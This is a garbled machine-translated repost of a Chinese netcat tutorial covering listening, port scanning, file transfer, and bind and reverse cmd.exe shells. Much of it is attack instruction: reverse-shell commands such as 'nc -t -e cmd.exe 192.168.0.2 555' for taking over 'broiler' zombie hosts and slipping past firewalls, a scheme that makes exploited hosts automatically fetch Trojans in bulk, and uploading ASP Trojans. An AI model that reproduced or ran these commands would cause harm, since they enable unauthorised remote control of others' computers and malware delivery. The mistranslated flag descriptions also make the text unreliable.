Parameters:
-H view help
-d background mode
-e prog redirector, but connected to perform a [risk]
interval delay -i secs
-l listening mode for inbound connections
-L listening mode connection after days of continued close monitoring, until C + CTR
-n IP addresses, domain names can not be used
in hexadecimal Film transfer record -o
-p [space] port local port number
-r random local and remote ports
-t interactively using Telnet
-u UDP mode
-v verbose output -vv more detail with
-w timeout delay interval digital
-z input, output switch off (when anchor for sweep)
-----
Command 1 : listening for commands
NC -l -p Port
NC Port -l -p> E: /log.dat
NC -v -l -p Port
Parameters explanation:
the -l: listening port to listen for incoming information
-p: followed by the local port number
-v: displays information about the port, if using -vv, then the port more detailed information is displayed
Tip: Generally we all love to use - VV
nc the -l -p 80
this is very simple, listening on port 80
if you are running this command on the machine, port 80 is considered to be open, the scanner can fool a lot of Oh!
nc -l -p 80> e: /log.dat
features and top the same, but behind added a "> e: /log.dat" I think, learned ECHO
will know that the command of it, is in the E drive log.dat create a log file
nc -l -v -p 80
and is similar to the top command, but this is not recorded in the file, but will be displayed directly in the running NC
on the screen.
nc -l -v -p 80
and enter the local IP browser: 127.0.0.1
Command 2 : Program orientation
nc -l -p port -t -e cmd.exe
the local machine: nc -l -p port nc -l -v -p port or
target: nc -e cmd.exe ip port
of parameters:
-l, -p two parameters already explained
-e; the role of the program is directed
-t: telnet to answer in the form of
examples
nc -l -p 5277 -t -e cmd.exe
know where to run it? Do not run on your machine, if you run, your machine
will become a TELNET server, and Oh, explain: listening local port 5277 of
incoming information, while CMD.exe this program, heavy directed to port 5277, when it was attached, form CMD.exe let TELNET program in response to the connection request.
To put it plainly, in fact, let him become a TELNET broilers, so this command to run on your broiler. .
Oh, let's try to come broiler, 5277 I IP TELNET
local Machine: nc the -l -p Port (or nc -v the -l -p Port)
Remote Machine: nc -e cmd.exe ip Port
We all know that pigeon and gray Thief of it, these two tools is the use of a type of Trojan rebound ports,
what port rebound? That is, when the other horses in, you do not have the initiative and the other connection, that is
not running on the server side to the other host sends a connection request from your client side, but the other party take the initiative to connect you
This will allow many firewalls fail, because many firewalls do not examine outbound request.
Here after these two commands together, in that the two Trojans can say a similar effect. why?
nc -l -p 5277 (Kennedy listened to the local port 5277)
also can be used
nc -l -v -p 5277
running locally
and on a remote machine, try to run
nc -e cmd.exe ip 5277
(you can not really the play "ip" ah) fight on the meat machine, xxx.xxx.xxx.xxx so! !
Oh, look what appeared on the local machine?
This is ~~ get a rebound on the local machine SHELL
3 commands : port scanning
nc -v ip Port
NC -v the -Z-IP Port Port
NC -v -u the -Z-IP Port Port
of parameters:
the -Z: turn off the input and output used when scanning
nc -v ip port
this command is to scan for a port
such as:
nc -v 135 ip
scan remote host port 135, so get some simple information of the port, but for some ports, we can also get more information
for example: 80-port
we can use the nc -v ip 80 and then use the method to get access to each other's WEB server information
nc -v -z ip port-port
command this command is used to scan, this command is used to quickly scan TCP port, the port-port is a designated port range to scan
for example:
nc -v the -z ip 1-200
can see TCP ports open case from 1 to 200 on my machine
nc -v -z -u ip port-port
this command is more than the previous one -u command, this command does still scan ports, but a multi-parameter -u is used to sweep the UDP ports
for example:
NC 1-200 IP -v -u the -Z
this command will sweep UDP port 1-200
Command 4 : file transfer (HOHO, the LIKE the I)
the LOCAL MACHINE: NC -v -n IP Port <X: /svr.exe
the REMOTE MACHINE: NC Port -v -l -p> Y: /svr.exe
of parameters:
- n: IP address of the specified number
which is used to combine the two commands to transfer files
first, run commands on the remote machine:
nc -v the -l -p 5277> c: /pulist.exe
this command also remember it? Oh, is not and listens for commands somewhat similar, yes, yes, this is the listening port 5277
and the information data received written c: /pulist.exe in
this time running on the local machine
nc -v -n ip 5277 < e: /hack/pulist.exe
this command means that, pulist.exe read the contents of a file from a local directory with the E disk, and sends the data to a 5277 port ip of
this remote host will automatically create a pulist .EXE
--------
Look at some simple usage:
Nc -nvv 192.168.0.1 80 port 80 is connected to the host 192.168.0.1
TCP 80 port nc -l -p 80 Turn on the machine and listens
nc -nvv -w2 -z 192.168.0.1 80-1024 80-1024 anchor scavenging ports of 192.168.0.1
Advanced Usage:
nc -L -p 3389 honeypots do, keep listening 3389
nc -L -p 3389> c: \ log.txt honeypots do, constantly monitor 3389, and outputs the result to c: \ log.txt
nc -L -p 3389 <c: \ ftp.txt constantly listening port 3389, and the c: \ ftp.txt sent contents of the local port connected to the master
Machine, can play the role of the file transfer. (This usage is often used for the reverse overflow)
cmd nc -l -p 2008 -t -e cmd.exe bind to host port 2008, and TELNET way to answer.
nc -t -e cmd.exe 192.168.0.2 555 binding cmd reverse connection port 555 to 192.168.0.2 TELNET way response.
Use a combination of:
1. overflow with:
nc -L -p 8989 <c: \ ftp.txt (ftp.txt automatically download command FTP)
Effect: a host connected to the spill port 8989 will automatically be specified FTP download files, such as Trojan (This method is frequently used for bulk overflow).
2. Return CMD SHELL by:
Forward connection:
Running on the remote host nc -l -p 2008 -t -e cmd.exe
Run nc -nvv 192.168.0.1 2008
The connection is successful it will return a CMD shell. (Similar to TELNET)
Reverse connection:
In the first run the machine nc -l -p 2008
Running on the remote host nc -t -e cmd.exe 192.168.0.2 2008
The connection is successful you will get a CMD shell. (Similar to TELNET)
3. upload text
Run nc -vv www.baidu.com 80 <1.txt (This method is frequently used to upload ASP Trojan)
Run nc -nvv 192.168.0.1 80 <1.txt (1.txt in transmitting content to 192.168.0.1)
There will be time to record a video release
Reproduced in: https: //www.cnblogs.com/zoushou/p/4125090.html